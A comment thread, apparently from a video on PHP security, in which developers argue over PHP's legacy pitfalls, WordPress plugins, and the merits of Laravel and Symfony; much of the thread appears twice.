Fun fact: 20 or so years ago I got into an argument with DHH in the comments of my blog, specifically about his comparing Rails (a framework) to PHP (a language). This was on a custom blog, written in PHP, hosted on my iMac, from a trailer park.
PHP is a language designed for the web, whereas Rails is a framework in an allegedly more readable Perl. Ruby is probably more consistent argument-order-wise, but requires learning sigils and odd control flows. PHP is often just HTML with some dynamic server side code that does everything you need as opposed to yet another template language that doesn't quite.
I literally got into an argument with a grad student recently about whether or not PHP was insecure. It was really annoying because I don't even code in PHP but it was really frustrating that someone who is actively studying computer science could have so many misconceptions about the internet. He straight tried to say that websites written with PHP could be taken control of with kali linux. At some point you have to wonder how people get that far in a degree program with such basic misconceptions or no knowledge of what the internet is made of.
DK effect baby, but grad student? Sounds like somebody was spending too much time looking at their grades/writing papers than learning anything about the internet lol. That sounds like a nightmare.
@@darylphuah i remember when I was starting to learn PHP and I asked my teacher why is unsecure , he answered: - just try to invade my website if it is so unsecure . And then I shuted my mouth . Simply we can't base our selfs on what random people keep talking about an language or even any Subject. And then i learned that the problem isn't the lang , the problem is those devs that rely on chatGPT and on reditt opinions.
I honestly don't think it's that surprising. Academia isn't really designed/equipped to convey that sort of practical industry knowledge. Unless their degree was specifically related to cyber security, they're unlikely to have had any direct experience with either offensive or defensive security practices
Personally just got into PHP for the job prospects in my local area. Mostly Wordpress stuff but I've been learning Laravel to dip into Full-Stack and I can say that I'm starting to love Laravel just by how easy it is to build features, and from how well the documentation is.
@@semyaza555 Not OP, but a somewhat regular Laravel developer. The documentation is incredibly good and full of examples. If you like a more hands on approach, look for Laracasts, it's a paid resource but with a lot of free conten you can pick up and study.
There's... a lot of problems with PHP, and especially wordpress. The foundational security is not really one of them, until you start getting into wordpress plugins. But the architecture of wordpress just... sucks. Wholesale, it's terrible. The language sucks, wordpress sucks, I hate having to deal with it when I get a contract job dealing in PHP.
@@nZifnabPHP is ok. Wordpress on another hand not that great. Biggest con is that they dont have templating engine to this day so html is mixed with PHP everywhere.
You never heard this? How young are you that you can't remember a time where PHP just spit any query parameters out as global variables, potentially overwriting things like $isadmin. Also the insanity of string tainting. And multiple SQL escaping functions until they finally got it right. It's all fixed now, but that was the state at some point.
The register_globals era, although it was disabled by default two decades ago and it's usage was actively discouraged all over the place before being complete removed, it still bit a lot of folks in the 2000s which insisted on using it.
I agree with the point about PHP being used for examples. A lot of the simplest exploits you run into when you start getting into CTFs/learning cyber-security involve dropping a PHP reverse shell on a server. While I am sure PHP can be secure, it is the first thing I look for when 'recreational hacking' since despite being an amateur I know a few common ways to take advantage of PHP. I think that the beginner friendly nature of these exploits makes it easy to say 'PHP is insecure' even if Wordpress is the only place some of the underlying configuration issues are likely to show up.
As PHP and WordPress are so easy to use, they're quite popular, and thus a more likely target to exploit for monetary gain. More popularity also means more code/bugs.
@@Ford-ju9yr if it is set up correctly I would not be able to, hence PHP can be secure. Based on my limited understanding the major concern for any language is anyplace user input can be processed by the server. So don't upload user files into a directory where PHP might evaluate them (even if you think you are only allowing jpegs or other safe filetypes there can be ways to bypass such filters) make sure you are not evaluating anything coming back from the browser (cookies, query parameters from the URL) make sure that 3rd party code on the server is up to date... You know the basic stuff
They can say anything about php but most linux distros have an page on their wiki dedicated for PHP because is the fastest way to setup your server and running an website, you just need to upload the PHP files to the server and use composer for dependencies if you need.
Nowadays I don't think this is really true. Most modern languages have an http library as part of stdlib that lets you define handlers + has standard file handlers. In golang setting up an http project to respond to most requests serving from a static directory and some special handlers interacting with a db is 15 lines and that's a lower level example. Python doesn't have it in stdlib, but setting up the same thing with common frameworks is 10 lines or similar, and both of those have package managers that handle dependencies for you.
Laravel dev here and I can say that most of use cases can be solved with PHP / Laravel. I haven't seen (correct me if I am wrong) another framework with so many features out of the box and a really good doc like Laravel. We get security patches regularly and we even have tools like Laravel shift to upgrade our projects within the time of fetching a coffee. The ecosystem around PHP and Laravel is HUGE (Pest, Inertia, Livewire, Octane, Forge, Tinker, Herd, ...). Performances are ok for the majority of apps. Even some native tools are coming to life like PHP Native. Of course PHP is not the most popular language in the world but does it mean that it is bad ? No. Personnally I think most people remember PHP like it was before 7 and I really think that a lot people would love it if they would give it another chance.
Laravel is great, but it is missing quite a bit of functionality that has to be provided by packages. Nested sets are a great example of something that should just be part of the framework.
Depends how you want to count there was a reason ASP was mentioned as part of the .NET ecosystem . You have also Blaze for the front end and Maui for mobile + the nuget libraries. You can pack all this in one solution for your product otherwise said: Pages, server , mobil app for Android and iOS , custom libraries, admin tools all written in one language only some XML variant(HTML) which anyway you have with other languages too.
@@KingSvenDeluxe what exactly is it missing? It's slogan was something along the lines of "batteries included, but replaceable". Additional stuff is provided with their first-party packages for convenience purposes, I would say. Something like role management and others are something that you can whip up yourself with relative ease. It's just that since you started doing it yourself, you maybe think to yourself "well, maybe this Spatie package provides me with all that I need and more, I feel kinda lazy writing this... fine, I'll install that package". They shouldn't really put everything under the sun into the framework, it will become bloated.
As someone who has used MERN and now is trying out laravel, I can say it has a lot of features out of the box, is easy to use, and the way it forces an architecture on you can be a good point. But its tooling is quite lacking, especially in vscode, and for a language that (now) has (basic) types built in beside phpdoc, it sure isn't benefiting from them as much as something like typescript does. I've also had to setup phpstan beside intellephense to lint the code, and both of those don't agree on which methods exist on which classes, and it's quite a mess. Some things can be quite annoying as well. Like for example, the built in session authentication will not set sameSite to none because it's overridden by some package. Or setting up uuids for all tables requires too much of a workaround. Or the fact that multi table token authentication almost killed me to implement, and I still don't know how to make sense of the way it works since there are several ways to handle auth and it isn't clear in the docs how it all works. A great frameworks, but there's also something to be said for a minimal do-it-yourself approach.
(Disclaimer: I'm not through the whole video yet.) PHP is used pretty often in CTF's showing vulnerabilities. That may be one reason people think it's more vulnerable. Also to the point if most people are trained on one language's exploits.. Doesn't that mean that language is more likely to be exploited, making it... more vulnerable...
From what I know of CTFs. Usually the PHP vulnerabilities are ones that you could run into any other language with. It's just easier to execute and showcase in PHP. Things such a serialization/unserialization, rce via shell injection due to the code taking unsanitized user input and slapping it into an exec() statement, sql injection via unsanitized user input. PHP allows easy access to these foot guns. But you have to go out of your way to actually put bullets into the guns. I.E. take untrusted user input and put it into something that it should never be put into under any circumstance. As such, no. Because it is not a PHP specific thing you're exploiting. But rather intentionally poorly written code that you are exploiting. It does not make anyone else's PHP instance more or less vulnerable. You are chasing after a concept in the ctfs. Not something specific to PHP. Node can do serialization/deserialzation of objects. You can shell inject or sql inject in python.
I remember about 11 years ago when I discovered PHP and I was mesmerised by how easy it was to develop dynamic web applications by just pasting some PHP code in the HTML, which was a breath of fresh air compared to Java at the time. Even back then the topic of "PHP is vulnerable" was quite popular, but I agree that it's the devs who make vulnerabilities, not the language.
In my time 90% of the issues were MySQL related because for whatever reason, most devs didn't use prepared statements even though every guide only explained MySQL connections with prapared statements. Really weird.
I think it's also part of the language design, programming conventions and patterns back then. As stated in the blog, back then, the zeitgeist leaned more onto the ease of use and approachability towards new developers (PHP, Java, JS, VisualBasic, etc.), not with safety and correctness we see highlighted a lot nowadays.
I wish we'd prefer the term unsecure over insecure. Unsecure definitely means a security risk, and not that the language has confidence and self-esteem issues.
I am a professional web dev and we use php 8.2 ... it's almost as if you're writing C# or Java when you use strict typing (literally a php feature these days)
PHP is extremely insecure. I have seen thousands of hacked websites and thousands of vulnerabilities that should not exist. I believe a language/framework is supposed to provide safety nets from common pitfalls. Few examples: in_array is not reliable upto 7.4 Most xss vulnerabilities are there because PHP does not escape things by default like erb in rails for example. And 100 other reasons...
Which does not say anything about PHP but rather about the PHP developers who most likely use vanilla PHP and have no idea what they are doing. (Also as mentioned in the video, most websites run on PHP so obviously most vulnerable websites will also be written in PHP)
"You can't tell it's PHP code unless you see the extension." IDK what he means by that, but the dollar signs in front of all the variables is a pretty good sign I'm in PHP-land. That or Bash, and I'm not sure which is worse. Also, "only a bad craftsman blames his tools" is just factually untrue. Only a bad craftsman blames his tools _for bad work,_ sure, but good craftsmen will 100% say their tools are bad and blame bad tools for slow and frustrating work. Bad tools are bad tools, and anyone who says "only a bad craftsman blames his tools" are bean counters/cheapskates/managers/old farts who have never used the right tools in the first place and probably don't work anymore (or worse, they've never even done the work in the first place), so they need to shut up and go home. Yes, I'm salty about this, I've heard it far too often back when I was in carpentry. Mostly from old farts who would lead every sentence with "back in my day" when "my day" precluded the existence of hydraulic machinery and widespread electricity.
My full stack class in college did 2-4 weeks in php. I thought it was a great introduction. Way less complicated than the end of the class that introduced “The Frameworks”. Seems like a straight forward approach to doing complicated things. I did however not like the global state nature of it. Seemed short sighted.
The language evolved from a toy technology that some guy used to develop his on home page (Personal Home Page). There are a few things that are short sighted due to this legacy.
Indeed you have global state because everything is run in context of one request, so that request is your whole "world". But I don't think that's an issue really. If you mean global variables and other stuff which is practically global (service containers in frameworks etc) then it's optional and mostly discouraged. Still, you can do a ton of weird stuff in PHP and make extremely hard to understand code.
As a full time php dev, I can say it is an okay language. Security is no issue and the language has become much more developer friendly and oop-rich since PHP 7.0 release in 2015. I still would not generally recommend the language, because it is only useful for backend. A lot of languages can do backend, and at the same time be used as command tools, frontend and non-web related stuff.
One of my major issues with PHP is that it's a script language. It runs the script then stops. That's great for simple websites, but the moment you need to do something like keeping track of the amount of requests you're doing for rate limiting, you need something external to keep track of it. With any other language that doesn't stop running once a request has been processed, that problem is fairly trivial. While it can obviously be trivial in PHP as well, there's just a lot more to it. I think it's really nice because of the simplicity and PHP 8.2 has introduced some really nice toys to play with, but I'd still pick most other languages over it.
@@CottidaeSEA I'd argue that if you're rate limiting you need something external to keep up with it anyway. Companies are going to ask why they're being rate limited, etc. Not only that, in the case of a crash/reboot you'd ideally want your limits to be cached & reloaded upon reboot.
@@Microtardz That could be done through a database. Also, the throttling isn't enforced in our system, it's adhered to, the external system has a request limit so we need to ensure we don't break it. As such, throttling can be necessary and in certain cases with fine-grained control if some requests are more important than others. All of which could've been done through PHP and a database if it didn't shut down after request completion. There is stuff like OpenSwoole which actually keeps everything running, but that also requires a fundamental change to session management.
I would say PHP I’d vulnerable because there are 7800+ CVEs against PHP, where Rails has 193. In both cases, these are applications built on the language. Given Github and Spotify are Rails applications and Spotify handles 10% of e-commerce during Xmas, they must be secure.
I'm really wondering why you are trashing Joomla here. From the myriad of PHP CMS, Joomla probably is the most solid one out there. Especially comparing to the "market leader"...
I don't mean that sarcastically. Joomla has flaws, but the flaws I mean are rather minor and from past discussions it always turned out that people's opinions were formed by experiences from 15 years ago, while they always were astonished by what joomla does, especially compared to WordPress.
Back in the day, PHP\'s brilliant ideas on how to secure applications would instill me with confidence. \"There\'s no way these guys don\'t know what they\'re doing\", I\'d think.
00:37 i think from that $_GET can contain array values (from query string like "a[]=1&a[]=2") but php author assumed that values can only be strings there is no mention of syntax like "a[]=1&a[]=2" in $_GET documentation btw edit: there is but in "Variables From External Sources" page
The page about $_GET is in line with all other pages about superglobals, explaining their general content. GET, POST and REQUEST all link to "Variables from external sources", where the general concept of receiving data is explained (no use to maintain copies of that on all three previous pages if you can link to a "see also" page instead), and has both an example and a link to the FAQ page where this topic is also discussed. It is admittedly a challenge to find the correct search terms to find the page you need explaining the thing you struggle with - the PHP documentation is still quite good.
PHP encourages writing insecure code by its very design. And the article pretty much says "yeah, so there are foot guns lying around, but you're not necessarily forced to use them". Well, my brother in Ch, if they are lying around, someone's going to use them. They cannot be removed precisely for the reason that someone IS actually using them. If these were simply legacy features nobody uses, they would have been deprecated by now and removed.
I am in the position to know to that a lot of less experience devs write important code. PHP suffers from bad press, I get that, but that doesn't change the fact that when you go to learn it you are essentially taught to raw dog php, at least that was the case for me. What PHP needs, is a wave of new up-to-date tutorials of how to write it properly. No, setting up WordPress is not a PHP tutorial and most people get it wrong.
What drove me away from PHP, really was how laser focus is on web development (maybe this has changed, please correct me if I'm wrong), this not a bad thing specially today, but i prefer languages with a wider use cases, by the way when i saw Laravel for the first time i was mind blown, such a good framework, every need of web development under the sun is probably implemented and well maintained on that framework
Ok, I need to counter the "a poor worker blames his tools" point from the article. The point of that saying isn't that bad tools don't exist, or that a good worker will be able to do good things with bad tools - it's that a good worker will ensure they have appropriate tools. In this context, that means the proverbial good worker will try out PHP, see the problems, then find something better, while the proverbial bad worker will try out PHP, see the problems, then just keep using it anyway because they're too lazy to learn a new tool, probably ending up in denial about it and making cope-posts online about how all the PHP hate is unjustified. Or maybe PHP isn't a bad tool. Either way, don't use that saying as a counter to criticism of a tool, because it's not.
I am toying with the idea of writing a full blog post about this because this argument comes up over and over. It drives me nuts when people say stuff like "well, all languages have flaws"... quietly disregarding the fact that PHP has more/bigger flaws. It leads to this implication that there is no such thing as quality in programming languages, which is just not true. The very fact that each release to a language adds/deprecates features suggests that they want to move closer to perceived perfection. TLDR your comment is spot on.
Learn the best security practices from the beginning when handling databases with PHP and you're pretty much good. PHP is up to snuff when it comes to security these days. Really have had zero problems utilizing AWS EC2 (running LAMP stack) + Secret manager. Shits pretty secure, would recommend.
It’s even nicer that we don’t have to ask Stack Overflow or Reddit our questions anymore, since none of those people are capable of contributing to the benefit of themselves or humanity, anyway. ChatGPT understands PHP infinitely better than anyone on literally any modern forum just about ever. Can’t see one nearly invisible error? Just ask Chat and the fix is nearly immediate on the first question. T_T
13:45 No, it isn't the same thing. Uninformed just means that somebody doesn't know about something. Ignorant is worse, people who are ignorant about some things actively don't want to know about it and refuse to change their opinion even if faced with the contrary.
My professor almost flanked my FYP because I use Laravel, cuz PHP is insecure………. I explain to him how SSR and the framework have gates to stop the known vulnerabilities he noted. And he still wanted to flank me, even though the main code bits are not in the web site of things, it just for me to host the application…
Love that Article, My thoughts exactly. The only way, I see Raw PHP being vulnerable is by negligence. PHP is not strongly typed so if you don't typecheck or typecast your inputs, or forget to sanitize anything, your Application becomes vulnerable. A PHP program is only as good, as the programmer writing it. That example takes an unsanitized input "$_GET" and pumps it straight into an unsanitized output "echo" . What do these people, complainging about security, expect? PHP does what you tell it to do. It's the same as with HTMX and people complaining about it making XSS possible.
I recall reading somewhere an analogy of PHP developers being like carpenters with odd tools making misshapen houses and yelling at you because when you open the front door and the back wall falls over, as if it's your fault and not theirs for making a shit house. That's you. Good tools make The Right Thing easy and the default, and The Wrong Thing hard, if not impossible. PHP does the exact opposite (and to be fair, in a lot of ways, so does JS), which you've so neatly demonstrated, which is why it gets the ire that it does.
@@BloodEyePact Uhh getting, personal already. I don't yell at my clients if something breaks. I simply fix it. You don't need PHP to create a garbage System. To stay with your analogy, If you have multiple carpenters work on the same piece of carpentry, but each one can only work if they have the specific tools, they are used to, then things get crowded in the workshop quickly. I had to work on a Node project once that used Bootstrap, PicoCSS, and Tailwind all glued together with some custom CSS, All because each previous dev was conviced, his/her favorite CSS Framework is "The thing" that will make things easier and better, but then they failed to adapt, what was already there to their "easier to use" framework. Keep it simple. You don't need a Hammer factory if all you want to do is put a nail in the Wall.
@@AScribblingTurtle Don't misunderstand, I'm not claiming you yell at your clients, I'm pointing out that you are blaming PHP developers for using the common default way of doing things and those turn out to be extremely dangerous. PHP is not made any better by the fact that you can create garbage with anything, the issue remains that it makes it easy to make garbage, and hard to make something good, because every feature requires complex, specific boilerplate to make it work the way it ought to have worked in the first place, and the way most people will think it works until they find out the hard way. Its complexity is not the issue at hand, though its certainly not its strong suit, just take a look at the size of the "standard" library of thousands of functions with extremely specific behaviors and use cases. Finally, comparing PHP to browser languages is a bad comparison. Browsers support HTML, CSS and JS, so you're stuck with them unless you want to venture into WASM. PHP is server side, you made a conscious choice to use garbage. The choice to use PHP over just about any other language for new projects is negligence.
@@BloodEyePact Many PHP "standard" features stem from core extensions, that you can install or uninstall as you please, to save on loading times, etc. At least they are a standardized source. What do Node, Go and Rust have for example? A package ecosystem, that is filled with dozens of packages, that do the same thing. Some of which seem to work as intended until you hit an edgecase and find out the hard way, that they don't. (And before you mention it. I'm not a huge fan of composer, either. It just brings the flaws of a dependency-based package system like NPM to a language that does not need them. IMO) I agree with your sentiment about complexity not being PHP's strong suit. Use the right tool, for the right job. You don't use PHP if you need highly responsive applications. Just as you don't hammer a nail with a Screwdriver. And finally, if I can't compare the structure of a Client- to a Server application, let's take a Server-side Example instead. A few years back I had to work on a Node - Server, that used the 'mongodb', 'mongoose', and 'mongojs' packages all to connect to the same MongoDB, within the same project. It is easy to create garbage in any language. The Handholding that many younger Devs expect a language to do is ridiculous. The goal of the software is UX, not DX. PHP is a scripting language. All that Handholding costs valuable running time on EVERY call, just so the dev doesn't have to think ONCE about what he/she writes. You say it should work like people "think" it does? What happened to "learning your tools"? Finding out "the hard way", that something does not work is called learning. "Uhhh, I don't want to learn, I went through a 2 Week bootcamp and now I just want to write code I think is correct and grab a quick paycheck. memememe."
@@BloodEyePact nothing really comes close to PHP when it comes to shipping a server side solution. Most of the "problematic defaults" have been addressed for about 10 years. If you're stuck in that time.. that's your problem. Other "pro" languages like C/C++ gives you an even bigger gun to shoot your foot with. So using that as an argument doesn't really make sense.
Sometimes it seems like JS is the kid everybody is talking about how great it is while it tries to hide its flaws while PHP is just doing its thing in the background.
My friend works at a security company that probes for the various technologies used by vendors. Insecure and out of date PHP applications are still the majority of insecure and out of date applications out there.
You said it right there with "insecure and out of date". Its longevity means there are apps that run but no dev has touched them in forever. Similar story with many Windows exe's. Nothing to do with PHP IMHO other than its been around a long time and happens to power more sites on the web than anything else.
Infosec guy here. PHP is typically considered insecure not because it's a bad language or insecure because of libraries or anything like that. Generally it's the same as any other language, but PHP is generally more annoying to update to newer versions. Maintaining php is very annoying and often a nominal upgrade means a ton of work in testing.
There are managed PHP hosts and deprecation warnings are logged before features like magic quotes are removed in the next version. Tests should be automated anyway, because the website probably changes more often than there are mandatory upgrades to a new backwards-incompatible version.
@@CTimmerman If you see "managed host" you can often think "shared host" In shared hosting environments companies tend to maintain multiple servers with different versions of PHP on them and move applications to whichever server has the version they need. unfortunately most people dont maintain their apps and the servers with older versions end up full and the biggest resource hogs. thankfully these days containerization is making that less a problem. GDPR made shared hosting mostly infeasible in the eu. That said, it speaks to the fact that "hosted php" is a feature demonstrates the pain of maintaining php.
do you have an example? One of PHP's strongest and most annoying points is its backwards compatibility. In my previous job, we updated some legacy PHP5 code (which still had PHP4 syntax in some areas) all the way up to PHP 8.2 in about a month. No issues.
> PHP is generally more annoying to update to newer versions Harder than what? Node? Updating javascript libraries is a nightmare, and you have to do it all the time because the entire javascript ecosystem is full of critical vulnerabilities every other week. I would know, I get the dependabot alerts for it. Python? Python 2 to 3 was a literal nightmare. Java? Oh god please lets not get into jar hell or war files. ASP? Well you've got me there, I've never used it. Honestly speaking, I can't think of the last time updating PHP was a pain. Largely because everything was already following best practices such as using typed equality instead of loose equality everywhere. Going from 5.6 to 8.2 has been virtually painless over the years.
I think the problem stems more from educational content. Find me a file upload tutorial that doesn’t end up putting this new uploaded file into a /accessible/to/the/request/malicious.php This doesn’t mean PHP is insecure, it is the implementation which a lot of the resource seems to derive from poor educational content and the same people not wanting to understand the same thing in a deeper context. Frameworks have since made this much simpler by enforcing that public directory and ensuring storage paths are not accessible by URL but then most educational content will start telling you to symlink it to public…. Back at square one again
It's not the language, it hardly ever is, it's the developer and the ecosystem that are the main problems. That's why most JS is so garbage, too many inexperienced devs writing rubbish while using trash packages. PHP is a fine language these days, Laravel is pretty good... but then TurdPress still sticks around like a bad smell. TurdPress compounds poor code with a plugin ecosystem that is just the absolute worst.
I used PHP professionally for several years, and while it HAS made huge leaps I still can't stand the language. As for it being insecure, IMO the existence of features like extract() and using PHP for templating DO make it easier to write certain types of vulnerabilities regardless of what framework you're using IF you use those features. Sure you can avoid using unsafe features and have high standards for your code, but there are some foot guns that exist in PHP that I haven't seen in any other language.
PHP's security originated from it's ease. It was so easy, that bad programmers could throw together a website and think that it's perfect. PHP is an effective tool, I just hate using it.
Php used to be absolute shit (version 3) - you has to tweak the out of the box php.ini turning off things like register globals. And I still use perl. Not as a cgi. I use HTML::Mason and it let's you write perl the same way you do php.
That was a straw man argument. The argument has never been that the language was insecure, it is just that many of the applications written with PHP were insecure. 20 years later some of the apps have cleaned up their security, but that doesn’t change history.
Imagine having builtin templating capabilities to embed HTML inside the language only to prohibit using it and instead rely on an external tool (e.g. blade) that has pseudophp syntax, is very limited and has to be built into actual PHP…
@@rcmnet *Competent devs. To this day I find injectable DB access because someone in the company wrote it decades ago and "if it works, don't touch it". Some senior devs write it like this to this day, or at least copy-paste it from "parts that work".
My little noobie nerds! Because "ex-Googles" or any other "big techs" "Super Developers" and successful influencers, complain about PHP or any other language. It doesn't mean that they are right! Use the language of your choice. and just let them be influencers. At the end of the day, all that matters is if you did your job and earned the money for this job. With My respects!
We have a service built by a 3rd party in laravel php. Out of all our services, this gives us the most issues form our security scans. We have serveral services written in typescript and c# but it's our one service written in php that gives us the most issues. Maybe the developers used bad 3rd party packages, idk. But it gives me the impression that php is insecure without knowing much about the ecosystem of the language.
I'm okay with programming languages being insecure as you have to start somewhere. Programmers work at the boundary between the unsafe computer and the safe user environment. The idea of "safe at all costs" is bullshit. Footguns are another story.
When php runs 90% of the web in the 90"s, mosr of the vulnerabilities sgow up in php. And of those, how many WordPress sites had default admin settings it weak md5 passwords stored simply
The author of that post confused me. RAW PHP is insecure? and using a Framework will make it Secure? its not the problem of the Language then. it may be a problem on who is using it or how we or us use PHP. hehehe
Depends on the requirements quite a bit.. But if I didn't need a lot of weird integrations I'd go with Haskell / IHP. If I need support for lots of corporatey stuff I'd go with F# / Falco (+ Fable).
In the best case, sure, it's probably safe. The problem is 90% of it happens to be in use on wordpress sites, which are known to be hilariously unsecure.
Wordpress is not insecure by default. It's "just" that it is *extremely easy* to make a theme or plugin with security vulnerabilities without even trying.
Yeah a blank page might be less of an issue, but anything worth securing won't be a factory install of wordpress, it will have dozens of plugins.@@zekicay Even then, if you look at exploit trackers, there's a new core issue every few weeks. That's less than the daily ones related to plugins, but it's still really bad.
It's the WordPress dilemma. They are reaching and marketing towards a non-technical audience, therefore, they have to simplify and abstract away a lot of the stuff a newcomer might find difficult. A lot of that code kinda becomes ugly fast.
@@oserodal2702 Wordpress even after so many years, they haven't adopted or created any templating engine ( which gives you some guidelines ). Everything is in a PHP file if you want to, like 20 years ago (Queries, 'RAW' PHP, some CSS, some JS, some hooks, some PHP templating . Template overriding. You can do it with files, you can do it with hooks you can do it however. So, no structure. Defining a theme by a CSS file :'). A freaking JSON or YAML for defining a theme? Wordpress is still trying to escape the jQuery nightmare and bad written JS code from plugins. Wordpress database design sucks, or maybe I could say it does not have one. Either your write custom queries to optimise your website, OR you make almost 150-300 requests on page load when you have a lot of custom fields. Security is a non-existent subject - The abstract functional coding approach and all the folders that can be publicly accessed for Wordpress to work - it is just bad. wp/content/[plugins/**, themes/**, and so on]. When a lot of bad coded plugins are publicly available (the code - on you server) anyone can find exploits! Wordpress, unfortunately, powers up millions of websites, so its an easy target as a hot one too. It's a mess, and its a mess associated with PHP. I see developers make 'APPS' or using Wordpress as CMS for and API god dammit. But PHP 8+ is great @oserodal2702
I think PHP IS insecure, but not because reasons in article. PHP has some really bad functions that can do much more then almost everyone really needed. In later version some of that "features" can be disabled in config, but a lot of defaults are not great for security. Old API for system interactions or interops are archaic and booby-trapped.
skipped thru the entire video & only saw one line of actual code that didnt even illustatrate his point. it was literally just echo'ing the result of a concatenated string 😂
Fun fact: 20 or so years ago I got into an argument with DHH in the comments of my blog, specifically about his comparing Rails (a framework) to PHP (a language). This was on a custom blog, written in PHP, hosted on my iMac, from a trailer park.
Based
Wake up babe, new DHH lore just dropped
He did a similar thing a few years ago on twitter comparing rails to node.js 😂
PHP is a language designed for the web, whereas Rails is a framework in an allegedly more readable Perl. Ruby is probably more consistent argument-order-wise, but requires learning sigils and odd control flows. PHP is often just HTML with some dynamic server side code that does everything you need as opposed to yet another template language that doesn't quite.
Given the topic, it sounds like you won automatically
I literally got into an argument with a grad student recently about whether or not PHP was insecure. It was really annoying because I don't even code in PHP but it was really frustrating that someone who is actively studying computer science could have so many misconceptions about the internet. He straight tried to say that websites written with PHP could be taken control of with kali linux. At some point you have to wonder how people get that far in a degree program with such basic misconceptions or no knowledge of what the internet is made of.
#NotAllWebsites And there should be a SQL injection tool in Kali. #NotAllPHP uses prepared statements.
DK effect baby, but grad student? Sounds like somebody was spending too much time looking at their grades/writing papers than learning anything about the internet lol. That sounds like a nightmare.
no need to argue, just ask him to do it if its so damn easy.
@@darylphuah i remember when I was starting to learn PHP and I asked my teacher why is unsecure , he answered:
- just try to invade my website if it is so unsecure .
And then I shuted my mouth .
Simply we can't base our selfs on what random people keep talking about an language or even any Subject.
And then i learned that the problem isn't the lang , the problem is those devs that rely on chatGPT and on reditt opinions.
I honestly don't think it's that surprising. Academia isn't really designed/equipped to convey that sort of practical industry knowledge. Unless their degree was specifically related to cyber security, they're unlikely to have had any direct experience with either offensive or defensive security practices
Personally just got into PHP for the job prospects in my local area. Mostly Wordpress stuff but I've been learning Laravel to dip into Full-Stack and I can say that I'm starting to love Laravel just by how easy it is to build features, and from how well the documentation is.
I’m thinking about picking up Laravel. What are some good learning resources?
@@semyaza555 Not OP, but a somewhat regular Laravel developer. The documentation is incredibly good and full of examples. If you like a more hands on approach, look for Laracasts, it's a paid resource but with a lot of free conten you can pick up and study.
@@semyaza555check out laracasts. There are tons of tutorials there including a from scratch series.
docs
Laracasts !
One of the problems that lead to this type of argument is that for many people PHP and WordPress are synonymous.
Even so, does either prevent rawdogging SQL or equating random types like a secure framework might at least warn you for?
There's... a lot of problems with PHP, and especially wordpress. The foundational security is not really one of them, until you start getting into wordpress plugins. But the architecture of wordpress just... sucks. Wholesale, it's terrible. The language sucks, wordpress sucks, I hate having to deal with it when I get a contract job dealing in PHP.
@@nZifnab skill issue
@@nZifnabPHP is ok. Wordpress on another hand not that great. Biggest con is that they dont have templating engine to this day so html is mixed with PHP everywhere.
@@nZifnab you're just too lazy and can't read about WordPress API
You never heard this? How young are you that you can't remember a time where PHP just spit any query parameters out as global variables, potentially overwriting things like $isadmin. Also the insanity of string tainting. And multiple SQL escaping functions until they finally got it right. It's all fixed now, but that was the state at some point.
yeah and he doesnt blame the tool ,xDD if the tool (php) is perfect then why are they updating it
To be fair. PDO has prepared statements for almost 2 decades now, ppl just didn't use it.
@@nimmneun Yes, only two decades, i.e. a very recent feature. 😄 (I'm old. 😭)
The register_globals era, although it was disabled by default two decades ago and it's usage was actively discouraged all over the place before being complete removed, it still bit a lot of folks in the 2000s which insisted on using it.
Doesn't matter if it had that behavior, no one made you store your own important global variables there.
Would love a deep dive on Symfony or a comparison of it to Laravel. A different approach than Laravel and my preferred PHP Framework.
You prefer it, so why is Symfony better than Laravel?
@@CTimmerman we have to ask EU payment processors about that
@@yamix-tr Why? Don't those offer their secure API to anyone who pays for an account?
I agree with the point about PHP being used for examples. A lot of the simplest exploits you run into when you start getting into CTFs/learning cyber-security involve dropping a PHP reverse shell on a server. While I am sure PHP can be secure, it is the first thing I look for when 'recreational hacking' since despite being an amateur I know a few common ways to take advantage of PHP. I think that the beginner friendly nature of these exploits makes it easy to say 'PHP is insecure' even if Wordpress is the only place some of the underlying configuration issues are likely to show up.
As PHP and WordPress are so easy to use, they're quite popular, and thus a more likely target to exploit for monetary gain. More popularity also means more code/bugs.
How would you run your shell on a server set up correctly?
@@Ford-ju9yr if it is set up correctly I would not be able to, hence PHP can be secure. Based on my limited understanding the major concern for any language is anyplace user input can be processed by the server. So don't upload user files into a directory where PHP might evaluate them (even if you think you are only allowing jpegs or other safe filetypes there can be ways to bypass such filters) make sure you are not evaluating anything coming back from the browser (cookies, query parameters from the URL) make sure that 3rd party code on the server is up to date... You know the basic stuff
They can say anything about php but most linux distros have an page on their wiki dedicated for PHP because is the fastest way to setup your server and running an website, you just need to upload the PHP files to the server and use composer for dependencies if you need.
Nowadays I don't think this is really true.
Most modern languages have an http library as part of stdlib that lets you define handlers + has standard file handlers. In golang setting up an http project to respond to most requests serving from a static directory and some special handlers interacting with a db is 15 lines and that's a lower level example. Python doesn't have it in stdlib, but setting up the same thing with common frameworks is 10 lines or similar, and both of those have package managers that handle dependencies for you.
@@metznoah In php you don't need to write code to handle serve page via http. Let apache handle that. Php is still easier.
@@metznoah you can do the same in PHP since version 4 much time before golang exists .
@@metznoah Python doesn't have it in stdlib? python -m http.server
Laravel dev here and I can say that most of use cases can be solved with PHP / Laravel.
I haven't seen (correct me if I am wrong) another framework with so many features out of the box and a really good doc like Laravel.
We get security patches regularly and we even have tools like Laravel shift to upgrade our projects within the time of fetching a coffee.
The ecosystem around PHP and Laravel is HUGE (Pest, Inertia, Livewire, Octane, Forge, Tinker, Herd, ...).
Performances are ok for the majority of apps.
Even some native tools are coming to life like PHP Native.
Of course PHP is not the most popular language in the world but does it mean that it is bad ? No.
Personnally I think most people remember PHP like it was before 7 and I really think that a lot people would love it if they would give it another chance.
Laravel is great, but it is missing quite a bit of functionality that has to be provided by packages. Nested sets are a great example of something that should just be part of the framework.
Depends how you want to count there was a reason ASP was mentioned as part of the .NET ecosystem . You have also Blaze for the front end and Maui for mobile + the nuget libraries. You can pack all this in one solution for your product otherwise said: Pages, server , mobil app for Android and iOS , custom libraries, admin tools all written in one language only some XML variant(HTML) which anyway you have with other languages too.
@@KingSvenDeluxe what exactly is it missing? It's slogan was something along the lines of "batteries included, but replaceable". Additional stuff is provided with their first-party packages for convenience purposes, I would say. Something like role management and others are something that you can whip up yourself with relative ease. It's just that since you started doing it yourself, you maybe think to yourself "well, maybe this Spatie package provides me with all that I need and more, I feel kinda lazy writing this... fine, I'll install that package".
They shouldn't really put everything under the sun into the framework, it will become bloated.
@@ward7576 nested sets. Should be in any framework, really.
As someone who has used MERN and now is trying out laravel, I can say it has a lot of features out of the box, is easy to use, and the way it forces an architecture on you can be a good point.
